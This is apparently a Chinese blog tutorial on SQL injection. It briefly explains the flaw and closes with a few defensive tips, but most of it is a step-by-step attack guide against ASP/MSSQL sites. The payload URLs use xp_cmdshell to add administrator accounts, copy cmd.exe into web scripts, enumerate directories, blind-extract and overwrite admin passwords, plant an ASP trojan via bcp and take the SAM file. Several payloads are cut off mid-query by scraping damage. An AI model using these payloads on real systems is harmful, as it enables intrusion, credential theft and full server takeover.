SQL注入攻擊---web安全

一、什么是sql注入呢？

所謂SQL注入，就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串，最終達到欺騙服務器執行惡意的SQL命令，比如先前的很多影視網站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的，這類表單特別容易受到SQL注入式攻擊．當應用程序使用輸入內容來構造動態sql語句以訪問數據庫時，會發生sql注入攻擊。如果代碼使用存儲過程，而這些存儲過程作為包含未篩選的用戶輸入的字符串來傳遞，也會發生sql注入。黑客通過SQL注入攻擊可以拿到網站數據庫的訪問權限，之后他們就可以拿到網站數據庫中所有的數據，惡意的黑客可以通過SQL注入功能篡改數據庫中的數據甚至會把數據庫中的數據毀壞掉。做為網絡開發者的你對這種黑客行為恨之入骨，當然也有必要了解一下SQL注入這種功能方式的原理並學會如何通過代碼來保護自己的網站數據庫

二、sql注入產生原因

     sql注入攻擊是利用是指利用設計上的漏洞，在目標服務器上運行Sql語句以及進行其他方式的攻擊，動態生成Sql語句時沒有對用戶輸入的數據進行驗證是Sql注入攻擊得逞的主要原因。對於Java數據庫連接JDBC而言，SQL注入攻擊只對Statement有效，對PreparedStatement是無效的，這是因為PreparedStatement不允許在不同的插入時間改變查詢的邏輯結構。
    如驗證用戶是否存在的SQL語句為：
    用戶名'and pswd='密碼
如果在用戶名字段中輸入: 'or 1=1或是在密碼字段中輸入:'or 1=1

將繞過驗證，但這種手段只對只對Statement有效，對PreparedStatement無效。相對Statement有以下優點：
    1.防注入攻擊
    2.多次運行速度快
    3.防止數據庫緩沖區溢出
    4.代碼的可讀性可維護性好
    這四點使得PreparedStatement成為訪問數據庫的語句對象的首選，缺點是靈活性不夠好，有些場合還是必須使用Statement。

三、sql注入原理

下面我們來說一下sql注入原理，以使讀者對sql注入攻擊有一個感性的認識，至於其他攻擊，原理是一致的。

SQL注射能使攻擊者繞過認證機制，完全控制遠程服務器上的數據庫。 SQL是結構化查詢語言的簡稱，它是訪問數據庫的事實標准。目前，大多數Web應用都使用SQL數據庫來存放應用程序的數據。幾乎所有的Web應用在后台都使用某種SQL數據庫。跟大多數語言一樣，SQL語法允許數據庫命令和用戶數據混雜在一起的。如果開發人員不細心的話，用戶數據就有可能被解釋成命令，這樣的話，遠程用戶就不僅能向Web應用輸入數據，而且還可以在數據庫上執行任意命令了。

SQL注入式攻擊的主要形式有兩種。一是直接將代碼插入到與SQL命令串聯在一起並使得其以執行的用戶輸入變量。上面筆者舉的例子就是采用了這種方法。由於其直接與SQL語句捆綁，故也被稱為直接注入式攻擊法。二是一種間接的攻擊方法，它將惡意代碼注入要在表中存儲或者作為原書據存儲的字符串。在存儲的字符串中會連接到一個動態的SQL命令中，以執行一些惡意的SQL代碼。注入過程的工作方式是提前終止文本字符串，然后追加一個新的命令。如以直接注入式攻擊為例。就是在用戶輸入變量的時候，先用一個分號結束當前的語句。然后再插入一個惡意SQL語句即可。由於插入的命令可能在執行前追加其他字符串，因此攻擊者常常用注釋標記“—”來終止注入的字符串。執行時，系統會認為此后語句位注釋，故后續的文本將被忽略，不背編譯與執行。

四．SQL注入攻擊的簡單示例：

這里我們舉一個比較常見的例子來簡要說明一下sql注入的原理。假如我們有一個users表，里面有兩個字段username和password。在我們的java代碼中我們初學者都習慣用sql拼接的方式進行用戶驗證。比如："select id from users where username = '"+username +"' and password = '" + password +"'" 這里的username和password都是我們存取從web表單獲得的數據。下面我們來看一下一種簡單的注入，如果我們在表單中username的輸入框中輸入' or 1=1-- ，password的表單中隨便輸入一些東西，假如這里輸入123.此時我們所要執行的sql語句就變成了select id from users where username = '' or 1=1-- and password = '123'，我們來看一下這個sql，因為1=1是true，后面 and password = '123'被注釋掉了。所以這里完全跳過了sql驗證。這里只是簡單的舉一個例子。很多sql注入的方式還有很多。

SQL注入攻擊的總體思路是：

1.發現SQL注入位置；
2.判斷后台數據庫類型；
3.確定XP_CMDSHELL可執行情況
4.發現WEB虛擬目錄
5. 上傳ASP木馬；
6.得到管理員權限；

一、SQL注入漏洞的判斷

一般來說，SQL注入一般存在於形如：HTTP://xxx.xxx.xxx/abc.asp?id=XX等帶有參數的asp或者動態網頁中，有時一個動態網頁中可能只有一個參數，有時可能有N個參數，有時是整型參數，有時是字符串型參數，不能一概而論。總之只要是帶有參數的動態網頁且此網頁訪問了數據庫，那么就有可能存在SQL注入。如果程序員沒有安全意識，不進行必要的字符過濾，存在SQL注入的可能性就非常大。
為了全面了解動態網頁回答的信息，首選請調整IE的配置。把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。
為了把問題說明清楚，以下以HTTP://xxx.xxx.xxx/abc.asp?p=YY為例進行分析，YY可能是整型，也有可能是字符串。

1、整型參數的判斷
當輸入的參數YY為整型時，通常abc.asp中SQL語句原貌大致如下：
select * from 表名 where 字段=YY，所以可以用以下步驟測試SQL注入是否存在。
①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一個單引號)，此時abc.ASP中的SQL語句變成了
select * from 表名 where 字段=YY’，abc.asp運行異常；
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp運行正常，而且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運行結果相同；
③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp運行異常；
如果以上三步全面滿足，abc.asp中一定存在SQL注入漏洞。

2、特殊情況的處理
有時ASP程序員會在程序員過濾掉單引號等字符，以防止SQL注入。此時可以用以下幾種方法試一試。
①大小定混合法：由於VBS並不區分大小寫，而程序員在過濾時通常要么全部過濾大寫字符串，要么全部過濾小寫字符串，而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等；
②UNICODE法：在IIS中，以UNICODE字符集實現國際化，我們完全可以IE中輸入的字符串化成UNICODE字符串進行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；
③ASCII碼法：可以把輸入的部分或全部字符全部用ASCII碼代替，如U=chr(85),a=chr(97)等，ASCII信息參見附二；

二、區分數據庫服務器類型

一般來說，ACCESS與SQL－SERVER是最常用的數據庫服務器，盡管它們都支持T－SQL標准，但還有不同之處，而且不同的數據庫有不同的攻擊方法，必須要區別對待。

1、利用數據庫服務器的系統變量進行區分
SQL－SERVER有user,db_name()等系統變量，利用這些系統值不僅可以判斷SQL-SERVER，而且還可以得到大量有用信息。如：
① HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當前連接到數據庫的用戶名
②HTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當前正在使用的數據庫名；
2、利用系統表
ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問權限，而SQL-SERVER的系統表是sysobjects,在WEB環境下有訪問權限。對於以下兩條語句：
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
若數據庫是SQL-SERVE，則第一條，abc.asp一定運行正常，第二條則異常；若是ACCESS則兩條都會異常。

3、 MSSQL三個關鍵系統表
sysdatabases系統表：Microsoft SQL Server 上的每個數據庫在表中占一行。最初安裝 SQL Server 時，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 數據庫的項。該表只存儲在 master 數據庫中。這個表保存在master數據庫中，這個表中保存的是什么信息呢？這個非常重要。他是保存了所有的庫名,以及庫的ID和一些相關信息。
這里我把對於我們有用的字段名稱和相關說明給大家列出來。name //表示庫的名字。
dbid //表示庫的ID，dbid從1到5是系統的。分別是：master、model、msdb、mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫名。

Sysobjects：SQL-SERVER的每個數據庫內都有此系統表，它存放該數據庫內創建的所有對象，如約束、默認值、日志、規則、存儲過程等，每個對象在表中占一行。以下是此系統表的字段名稱和相關說明。
Name，id，xtype，uid，status：分別是對象名，對象ID，對象類型，所有者對象的用戶ID,對象狀態。
對象類型(xtype)。可以是下列對象類型中的一種：
C = CHECK 約束
D = 默認值或 DEFAULT 約束
F = FOREIGN KEY 約束
L = 日志
FN = 標量函數
IF = 內嵌表函數
P = 存儲過程
PK = PRIMARY KEY 約束（類型是 K）
RF = 復制篩選存儲過程
S = 系統表
TF = 表函數
TR = 觸發器
U = 用戶表
UQ = UNIQUE 約束（類型是 K）
V = 視圖
X = 擴展存儲過程
當xtype='U' and status>0代表是用戶建立的表，對象名就是表名，對象ID就是表的ID值。
用: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 就可以列出庫ChouYFD中所有的用戶建立的表名。

syscolumns ：每個表和視圖中的每列在表中占一行，存儲過程中的每個參數在表中也占一行。該表位於每個數據庫中。主要字段有：
name ，id， colid ：分別是字段名稱，表ID號，字段ID號，其中的 ID 是剛上我們用sysobjects得到的表的ID號。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個庫中，表的ID是123456789中的所有字段列表。

三、確定XP_CMDSHELL可執行情況

若當前連接數據的帳號具有SA權限，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過以下幾種方法完全控制，以后的所有步驟都可以省
1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp執行異常但可以得到當前連接數據庫的用戶名(若顯示dbo則代表SA)。
2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執行異常但可以得到當前連接的數據庫名。
3、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主數據庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其后面的語句；“—”號是注解，表示其后面的所有內容僅為注釋，系統並不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。
4、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加的帳戶aaa加到administrators組中。
5、HTTP://xxx.xxx.xxx/abc.asp?p=YY；backuup database 數據庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容全部備份到WEB目錄下，再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。
6、通過復制CMD創建UNICODE漏洞
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” 便制造了一個UNICODE漏洞，通過此漏洞的利用方法，便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。

四、發現WEB虛擬目錄

只有找到WEB虛擬目錄，才能確定放置ASP木馬的位置，進而得到USER權限。有兩種方法比較有效。
一是根據經驗猜解，一般來說，WEB虛擬目錄是：c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可執行虛擬目錄是：c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。
二是遍歷系統的目錄結構，分析結果並發現WEB虛擬目錄；
先創建一個臨時表：temp
HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
接下來：
（1）我們可以利用xp_availablemedia來獲得當前所有驅動器,並存入temp表中：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
我們可以通過查詢temp的內容來獲得驅動器列表及相關信息
（2）我們可以利用xp_subdirs獲得子目錄列表,並存入temp表中：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs 'c:\';--
（3）我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,並寸入temp表中：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
這樣就可以成功的瀏覽到所有的目錄（文件夾）列表：

如果我們需要查看某個文件的內容，可以通過執行xp_cmdsell：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec ... nbsp;'type c:\web\index.asp';--
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如：bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
瀏覽temp就可以看到index.asp文件的內容了！通過分析各種ASP文件，可以得到大量系統信息，WEB建設與管理信息，甚至可以得到SA帳號的連接密碼。

當然，如果xp_cmshell能夠執行，我們可以用它來完成：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&nbs ... cmdshell 'dir c:\';--
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&n ... p_cmdshell 'dir c:\ *.asp /s/a';--

通過xp_cmdshell我們可以看到所有想看到的，包括W3svc
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshe ... ub\AdminScripts\adsutil.vbs enum w3svc'

但是，如果不是SA權限，我們還可以使用
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

注意：
1、以上每完成一項瀏覽后，應刪除TEMP中的所有內容，刪除方法是：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
2、瀏覽TEMP表的方法是：(假設TestDB是當前連接的數據庫名)
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id字段的值，並與整數進行比較，顯然abc.asp工作異常，但在異常中卻可以發現id字段的值。假設發現的表名是xyz，則
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in('xyz'))>0 得到表TEMP中第二條記錄id字段的值。

五、上傳ASP木馬

所謂ASP木馬，就是一段有特殊功能的ASP代碼，並放入WEB虛擬目錄的Scripts下，遠程客戶通過IE就可執行它，進而得到系統的USER權限，實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法：
1、利用WEB的遠程管理功能
許多WEB站點，為了維護的方便，都提供了遠程管理的功能；也有不少WEB站點，其內容是對於不同的用戶有不同的訪問權限。為了達到對用戶權限的控制，都有一個網頁，要求用戶名與密碼，只有輸入了正確的值，才能進行下一步的操作,可以實現對WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。
因此，若獲取正確的用戶名與密碼，不僅可以上傳ASP木馬，有時甚至能夠直接得到USER權限而瀏覽系統，上一步的“發現WEB虛擬目錄”的復雜操作都可省略。
用戶名及密碼一般存放在一張表中，發現這張表並讀取其中內容便解決了問題。以下給出兩種有效方法。
A、注入法：
從理論上說，認證網頁中會有型如：
select * from admin where username='XXX' and passWord='YYY' 的語句，若在正式運行此句之前，沒有進行必要的字符過濾，則很容易實施SQL注入。
如在用戶名文本框內輸入：abc’ or 1=1-- 在密碼框內輸入：123 則SQL語句變成：
select * from admin where username='abc’ or 1=1 and password='123’ 不管用戶輸入任何用戶名與密碼，此語句永遠都能正確執行，用戶輕易騙過系統，獲取合法身份。
B、猜解法：
基本思路是：猜解所有數據庫名稱，猜出庫中的每張表名，分析可能是存放用戶名與密碼的表名，猜出表中的每個字段名，猜出表中的每條記錄內容。
l 猜解所有數據庫名稱
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 因為 dbid 的值從1到5，是系統用了。所以用戶自己建的一定是從6開始的。並且我們提交了 name>1 (name字段是一個字符型的字段和數字比較會出錯),abc.asp工作異常，可得到第一個數據庫名，同理把DBID分別改成7,8，9,10,11,12…就可得到所有數據庫名。
以下假設得到的數據庫名是TestDB。

l 猜解數據庫中用戶名表的名稱
猜解法：此方法就是根據個人的經驗猜表名，一般來說，user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。並通過語句進行判斷
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在，則abc.asp工作正常，否則異常。如此循環，直到猜到系統帳號表的名稱。
讀取法：SQL-SERVER有一個存放系統核心信息的表sysobjects，有關一個庫的所有表，視圖等信息全部存放在此表中，而且此表可以通過WEB進行訪問。
當xtype='U' and status>0代表是用戶建立的表，發現並分析每一個用戶建立的表及名稱，便可以得到用戶名表的名稱，基本的實現方法是：
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type='U' and status>0 )>0 得到第一個用戶建立表的名稱，並與整數進行比較，顯然abc.asp工作異常，但在異常中卻可以發現表的名稱。假設發現的表名是xyz，則
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in('xyz'))>0 可以得到第二個用戶建立的表的名稱，同理就可得到所有用建立的表的名稱。
根據表的名稱，一般可以認定那張表用戶存放用戶名及密碼，以下假設此表名為Admin。
l 猜解用戶名字段及密碼字段名稱
admin表中一定有一個用戶名字段，也一定有一個密碼字段，只有得到此兩個字段的名稱，才有可能得到此兩字段的內容。如何得到它們的名稱呢，同樣有以下兩種方法。
猜解法：此方法就是根據個人的經驗猜字段名，一般來說，用戶名字段的名稱常用：username,name,user,account等。而密碼字段的名稱常用：password,pass,pwd,passwd等。並通過語句進行判斷
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(字段名) from TestDB.dbo.admin)>0 “select count(字段名) from 表名”語句得到表的行數，所以若字段名存在，則abc.asp工作正常，否則異常。如此循環，直到猜到兩個字段的名稱。
讀取法：基本的實現方法是
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個字段名，當與整數進行比較，顯然abc.asp工作異常，但在異常中卻可以發現字段的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5，6…就可得到所有的字段名稱。
l 猜解用戶名與密碼
猜用戶名與密碼的內容最常用也是最有效的方法有：
ASCII碼逐字解碼法:雖然這種方法速度較慢，但肯定是可行的。基本的思路是先猜出字段的長度，然后依次猜出每一位的值。猜用戶名與猜密碼的方法相同，以下以猜用戶名為例說明其過程。
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username為用戶名字段的名稱，admin為表的名稱)，若x為某一值i且abc.asp運行正常時，則i就是第一個用戶名的長度。如：當輸入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8時abc.asp運行正常，則第一個用戶名的長度為8
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間，當m=1，2,3，…時猜測分別猜測第1,2,3,…位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin為系統用戶帳號表的名稱)，若n為某一值i且abc.asp運行正常時，則i對應ASCII碼就是用戶名某一位值。如：當輸入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時abc.asp運行正常，則用戶名的第三位為P(P的ASCII為80)；
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時abc.asp運行正常，則用戶名的第9位為!(!的ASCII為80)；
猜到第一個用戶名及密碼后，同理，可以猜出其他所有用戶名與密碼。注意：有時得到的密碼可能是經md5等方式加密后的信息，還需要用專用工具進行脫密。或者先改其密碼，使用完后再改回來，見下面說明。
簡單法：猜用戶名用
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一個字段，username是用戶名字段，此時abc.asp工作異常，但能得到Username的值。與上同樣的方法，可以得到第二用戶名，第三個用戶等等，直到表中的所有用戶名。
猜用戶密碼：HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flag是admin表中的一個字段，pwd是密碼字段，此時abc.asp工作異常，但能得到pwd的值。與上同樣的方法，可以得到第二用戶名的密碼，第三個用戶的密碼等等，直到表中的所有用戶的密碼。密碼有時是經MD5加密的，可以改密碼。
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=' ... where username='www';-- ( 1的MD5值為：AAABBBCCCDDDEEEF，即把密碼改成1；www為已知的用戶名)
用同樣的方法當然可把密碼改原來的值。

2、利用表內容導成文件功能
SQL有BCP命令，它可以把表的內容導成文本文件並放到指定位置。利用這項功能，我們可以先建一張臨時表，然后在表中一行一行地輸入一個ASP木馬，然后用BCP命令導出形成ASP文件。
命令行格式如下：
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P foobar ('S'參數為執行查詢的服務器，'U'參數為用戶名，'P'參數為密碼，最終上傳了一個runcommand.asp的木馬)

六、得到系統的管理員權限

ASP木馬只有USER權限，要想獲取對系統的完全控制，還要有系統的管理員權限。怎么辦？提升權限的方法有很多種：
上傳木馬，修改開機自動運行的.ini文件(它一重啟，便死定了)；
復制CMD.exe到scripts，人為制造UNICODE漏洞；
下載SAM文件，破解並獲取OS的所有用戶名密碼；
等等，視系統的具體情況而定，可以采取不同的方法。

后記

　　正如上文所描述的，SQL 漏洞危害非常的巨大，但我相信國內很多中小站點還普遍存在着這樣的漏洞。這里有些個人的不完全建議

1、代碼要對輸入的參數做到充分的過濾，並盡可能得考慮極端情況
　　2、錯誤信息盡可能的少，否則無關的人看不懂而有心的人就會提起興趣
　　3、不要以管理員的身份運行服務器進程
　　4、某些情況下，net 命令對於攻擊者而言就是“微軟牌”的木馬
　　5、嚴格控制遠程登錄訪問者的來源
　　6、如果可能的情況下，不是很推薦使用 Windows 作為服務器操作系統

分類: web 安全

標簽: sql